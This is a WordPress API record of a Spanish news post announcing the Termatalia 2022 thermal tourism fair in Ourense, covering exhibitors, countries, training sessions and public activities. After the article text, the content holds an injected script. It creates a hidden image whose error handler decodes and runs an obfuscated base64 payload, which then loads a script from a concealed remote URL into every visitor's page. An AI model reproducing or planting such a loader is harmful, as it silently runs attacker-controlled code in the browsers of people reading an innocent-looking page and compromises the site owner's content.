{"id":5845,"date":"2022-09-27T12:45:41","date_gmt":"2022-09-27T15:45:41","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5845"},"modified":"2025-08-13T16:12:20","modified_gmt":"2025-08-13T19:12:20","slug":"termatalia-2022-regresa-como-feria-completa-convocando-a-destinos-empresas-y-profesionales-del-turismo-de-salud-de-25-paises","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5845","title":{"rendered":"Termatalia 2022 regresa como feria completa convocando a destinos, empresas y profesionales del turismo de salud de 25 pa\u00edses"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg.webp\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg-1024x683.webp\" alt=\"\" class=\"wp-image-5846\" width=\"379\" height=\"253\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg-1024x683.webp 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg-768x512.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg-1068x712.webp 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg-480x320.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg-800x533.webp 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/rdp-termatalia-1-1536x1024.jpg.webp 1536w\" sizes=\"(max-width: 379px) 100vw, 379px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p><strong>&gt;&gt; Ourense se convierte esta semana en epicentro del termalismo mundial con la celebraci\u00f3n de Termatalia; el Congreso Internacional de Turismo Termal y el XXI Congreso Nacional de la Sociedad Espa\u00f1ola de Hidrolog\u00eda M\u00e9dica<\/strong><\/p>\n\n\n\n<p><strong>&gt;&gt; Negocio y formaci\u00f3n ser\u00e1n los ejes de la feria que se celebra los d\u00edas 29 y 30 de septiembre y que contar\u00e1 con 140 expositores, 70 ponentes y 25 touroperadores<\/strong><\/p>\n\n\n\n<p><strong>&gt;&gt; La reserva de sesiones termales a 1 euro, Bar de Aguas, Bar de Caf\u00e9s, zona de masajes, talleres sobre alimentaci\u00f3n saludable y yoga wellness son los principales atractivos para el p\u00fablico<\/strong><\/p>\n\n\n\n<p>Despu\u00e9s de un par\u00f3n de tres a\u00f1os provocado por la pandemia mundial, Termatalia recupera su papel de punto de encuentro internacional del sector del turismo de salud y celebra su vig\u00e9simo aniversario regresando como feria al completo que a\u00fana \u00e1rea expositiva, formaci\u00f3n especializada, negocio y capital relacional. La 20\u00aa Feria Internacional de Turismo Termal, Salud y Bienestar se celebra en Expourense los d\u00edas 29 y 30 de septiembre, en unos d\u00edas en los que Ourense se convierte en epicentro mundial ya que, adem\u00e1s de la propia Termatalia, se celebra el Congreso Internacional de Turismo Termal (27 a 29 de septiembre) organizado por la Asociaci\u00f3n Europea de Ciudades Hist\u00f3ricas Termales (EHTTA) y la Diputaci\u00f3n Provincial de Ourense bajo el amparo de la Organizaci\u00f3n Mundial de Turismo. El 30 de septiembre por la tarde y hasta el 2 de octubre, entre Expourense y el Balneario de Laias se celebra tambi\u00e9n el XXI Congreso Nacional de la Sociedad Espa\u00f1ola e Hidrolog\u00eda M\u00e9dica.<\/p>\n\n\n\n<p>La 20\u00aa edici\u00f3n de Termatalia se presenta como cita presencial y como gran punto de reencuentro de la comunidad termal internacional. Fue presentada esta ma\u00f1ana en un acto en el que participaron el delegado territorial de la Xunta de Galicia en Ourense, Gabriel Al\u00e9n; el vicepresidente de la Diputaci\u00f3n Provincial de Ourense y presidente del INORDE, Rosendo Fern\u00e1ndez, y el director de Termatalia, Rogelio Mart\u00ednez.<\/p>\n\n\n\n<p>Cuenta con la participaci\u00f3n de 140 expositores de Europa y Am\u00e9rica, fundamentalmente. Termatalia 2022 cuenta con la presencia directa de 25 pa\u00edses aunque, si se hace referencia a los pa\u00edses representados a trav\u00e9s de los expositores presentes o de acciones profesionales concretas como el World Coffee Challenge, esta cifra asciende a 55 pa\u00edses representados. Estos datos, sumados a la presencia de 70 disertantes internacionales, posicionan adem\u00e1s a Galicia y a Ourense como centro de formaci\u00f3n profesional en materia de termalismo.<\/p>\n\n\n\n<p>Los pa\u00edses con presencia directa en feria son: Alemania, Argentina, Austria, B\u00e9lgica, Brasil, Canad\u00e1, Chile, Colombia, Costa Rica, Croacia, Ecuador, Espa\u00f1a, Estados Unidos, Francia, Hungr\u00eda, Israel, Italia, Lituania, M\u00e9xico, Panam\u00e1, Per\u00fa, Polonia, Portugal, Suiza y Uruguay.<\/p>\n\n\n\n<p>Esta nueva edici\u00f3n volver\u00e1 a incidir en las claves para el desarrollo del sector: negocio formaci\u00f3n y capital relacional ofreciendo para ello un completo programa de actividades profesionales en las queda patente la necesidad de la cooperaci\u00f3n p\u00fablico-privada para el desarrollo del Turismo Termal y de Bienestar a nivel mundial.<\/p>\n\n\n\n<p><strong>ACCIONES DE NEGOCIO<\/strong><br>Termatalia recibir\u00e1 expositores de 25 pa\u00edses de Europa y Am\u00e9rica. Entre los pa\u00edses que han apostado firmemente por esta edici\u00f3n cabe destacar Uruguay que ha confirmado la presencia en feria de su viceministro de Turismo, Remo Monzeglio, que participar\u00e1 acompa\u00f1ado de una amplia comitiva de empresarios termales de este pa\u00eds que ha acrecentado su inter\u00e9s y participaci\u00f3n en Termatalia en esta edici\u00f3n que contar\u00e1 tambi\u00e9n con la presencia de la viceministra de Turismo de Panam\u00e1 y de los ministros de Turismo y del de Salud de la provincia de La Rioja en Argentina.<\/p>\n\n\n\n<p>Como es habitual, se celebrar\u00e1 un Workshop de Contrataci\u00f3n tur\u00edstica en el que est\u00e1 confirmada la participaci\u00f3n de 25 touroperadores de Espa\u00f1a, Alemania, Canad\u00e1, Colombia, Estados Unidos y Francia y que se reunir\u00e1n con los expositores de Termatalia.<\/p>\n\n\n\n<p><strong>FORMACI\u00d3N<\/strong><br>El programa de las Jornadas T\u00e9cnicas Profesionales de Termatalia 2022 abordar\u00e1 el agua termal desde distintas perspectivas: tur\u00edstica, patrimonial, cient\u00edfica y jur\u00eddica. Adem\u00e1s de las mesas redondas sobre el agua organizadas por el Vicerrectorado de la Universidad de Vigo, las jornadas de Termatalia incluyen tambi\u00e9n la primera sesi\u00f3n del Congreso de la Sociedad de Hidrolog\u00eda M\u00e9dica que tendr\u00e1n lugar el viernes 30 de septiembre por la tarde. Esta sesi\u00f3n contar\u00e1 con la participaci\u00f3n de prestigiosos profesionales de la hidrolog\u00eda mundial, muchos de ellos aut\u00e9nticos gur\u00fas para los profesionales del sector como es el caso, por poner solamente un ejemplo, del Profesor Johan Lambeck de Suiza, referencia mundial en terapia acu\u00e1tica.<\/p>\n\n\n\n<p>Estas jornadas incluir\u00e1n adem\u00e1s la presentaci\u00f3n a touroperadores y prensa especializada de aquellos destinos termales que apuestan por Termatalia como es el caso de la propia provincia de Ourense, de Uruguay o de las regiones de Murcia y Extremadura que ya son estrechos colaboradores de la feria, a los que en esta ocasi\u00f3n se suman las Viles Termals de Catalunya.<\/p>\n\n\n\n<p>Habr\u00e1 otras presentaciones dirigidas a p\u00fablico profesional como la ofrecida por Aqualia sobre las \u201cNuevas tendencias en la gesti\u00f3n de agua, energ\u00eda y minerales en balneoterapia\u201d o la presentaci\u00f3n de un estudio piloto sobre los efectos de la balneoterapia en pacientes COVID-19 persistente en la Vila Termal de Caldes de Montbui.<\/p>\n\n\n\n<p>Estas jornadas se complementan con cursos de formaci\u00f3n espec\u00edfica sobre aguas minerales y sobre peloides termales y con las presentaciones de los \u00faltimas estudios y publicaciones relacionados con el sector como es el caso del proyecto \u201cTERMAGAL\u201d promovido por la C\u00e1tedra de Hidrolog\u00eda M\u00e9dica de la Universidad de Santiago de Compostela y Balnearios de Galicia.<\/p>\n\n\n\n<p><strong>AGUA MINERAL<\/strong><br>Termatalia servir\u00e1 de plataforma para la Industria del Agua Mineral envasada con actividades como la Cata Internacional de Aguas que celebrar\u00e1 su 19\u00aa edici\u00f3n y en la que participan aguas minerales de Espa\u00f1a, Portugal, Costa Rica, Brasil y Francia. El jurado estar\u00e1 dirigido por la sumiller gallega Mercedes Gonz\u00e1lez y contar\u00e1 con un jurado de expertos de Espa\u00f1a, Portugal, Francia, Brasil y Estados Unidos.<\/p>\n\n\n\n<p><strong>VIVIR TERMATALIA \u2013 ACTIVIDADES PARA EL P\u00daBLICO<\/strong><br>A pesar de que la feria adquiere un car\u00e1cter m\u00e1s profesional, la organizaci\u00f3n ha preparado un completo programa de actividades para que el p\u00fablico pueda vivir la feria \u201cregal\u00e1ndose salud y bienestar\u201d. Una de las novedades de esta edici\u00f3n ser\u00e1 la campa\u00f1a puesta en marcha por la Diputaci\u00f3n Provincial de Ourense que repartir\u00e1 en su stand en Termatalia 250 sesiones termales a 1 euro y que llamar\u00e1 la atenci\u00f3n del p\u00fablico local que no dejar\u00e1 pasar esta oportunidad de disfrutar de una sesi\u00f3n por un precio tan reducido en uno de los cinco balnearios de la provincia adscritos a esta promoci\u00f3n.<br>Termatalia 2022 contar\u00e1 de nuevo con un \u00c1rea de Alimentaci\u00f3n Saludable que ofrecer\u00e1 talleres sobre alimentaci\u00f3n sana y consciente a cargo de la nutricionista Adriana Fern\u00e1ndez Vidal y del experto en gastronom\u00eda sostenible Alejandro Madrigal. Tambi\u00e9n habr\u00e1 talleres de cocina en director ofrecidos por el chef Carlos Parra (Ourense), por el chef Erick Sandoval (Costa Rica) o el organizado por la Asociaci\u00f3n Diab\u00e9tica Auria en colaboraci\u00f3n con Milhflor sobre aperitivos saludables. Tambi\u00e9n se impartir\u00e1n varios talleres de yoga wellness a cargo de la empresa Experiencia Wellness. Por su parte, la Xefatura Territorial de la Conseller\u00eda de Sanidade de la Xunta de Galicia, contar\u00e1 con un stand en el que realizar\u00e1n mediciones antropom\u00e9tricas y aconsejar\u00e1n sobre la adopci\u00f3n de h\u00e1bitos de vida saludables.<\/p>\n\n\n\n<p>Como es habitual, habr\u00e1 un Bar de Aguas con marcas internacionales de 5 pa\u00edses; varias \u00e1reas de masajes que ser\u00e1n ofrecidos por un lado, por el Centro Shalom y, por otro, por alumnos ya que, adem\u00e1s de distintas empresas, Termatalia ha involucrado adem\u00e1s a estudiantes de Formaci\u00f3n profesional de ramas relacionadas con el bienestar y la hosteler\u00eda y ya han confirmado la participaci\u00f3n en las actividades varios centros de FP de Galicia y Portugal.<\/p>\n\n\n\n<p>Una de las novedades de este a\u00f1o es la celebraci\u00f3n en Expourense del World Coffee Challenge \u2013 Termatalia 2022 organizado por la empresa francesa Alternative Caf\u00e9. A ra\u00edz del mismo, este a\u00f1o habr\u00e1 tambi\u00e9n orientadas al caf\u00e9 como un Bar de Caf\u00e9s o un taller que explique la importancia del agua a la hora de elaborar un buen caf\u00e9. Este concurso ha tenido una excelente acogida y en \u00e9l participar\u00e1n 75 productores de caf\u00e9 tostado en origen de m\u00e1s de 15 pa\u00edses de Am\u00e9rica, Europa, \u00c1frica y Asia.<\/p>\n\n\n\n<p>Termatalia 2022 cuenta con el apoyo principal de la Xunta de Galicia a trav\u00e9s de la Agencia Gallega de Turismo, de la Diputaci\u00f3n Provincial de Ourense y del Ayuntamiento de Ourense. Adem\u00e1s, cuenta como colaboradores con la empresa Aqualia, con el Campus Auga de Universidad de Vigo, la C\u00e1tedra de Hidrolog\u00eda M\u00e9dica-Balnearios de Galicia de la Universidad de Santiago de Compostela, Centro M\u00e9dico el Carmen, Aguas Minerales de Espa\u00f1a-ANEABE, RENFE, Cl\u00faster de Turismo de Galicia y la Sociedad Espa\u00f1ola de Hidrolog\u00eda M\u00e9dica.<\/p>\n\n\n\n<p>El horario de feria ser\u00e1 de 10.00 a 19.00 horas de forma ininterrumpida el jueves 29 y el viernes 30 de septiembre. Toda la informaci\u00f3n est\u00e1 disponible en www.termatalia.com y en sus redes sociales.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>&gt;&gt; Ourense se convierte esta semana en epicentro del termalismo mundial con la celebraci\u00f3n de Termatalia; el Congreso Internacional de Turismo Termal y el XXI Congreso Nacional de la Sociedad Espa\u00f1ola de Hidrolog\u00eda M\u00e9dica &gt;&gt; Negocio y formaci\u00f3n ser\u00e1n los ejes de la feria que se celebra los d\u00edas 29 y 30 de septiembre y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5847,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16,15,14,22],"tags":[],"class_list":["post-5845","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-medicina-termal","category-turismo-de-bienestar","category-turismo-salud","category-turismo-sostenible"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5845","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5845"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5845\/revisions"}],"predecessor-version":[{"id":10571,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5845\/revisions\/10571"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5847"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5845"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5845"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5845"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}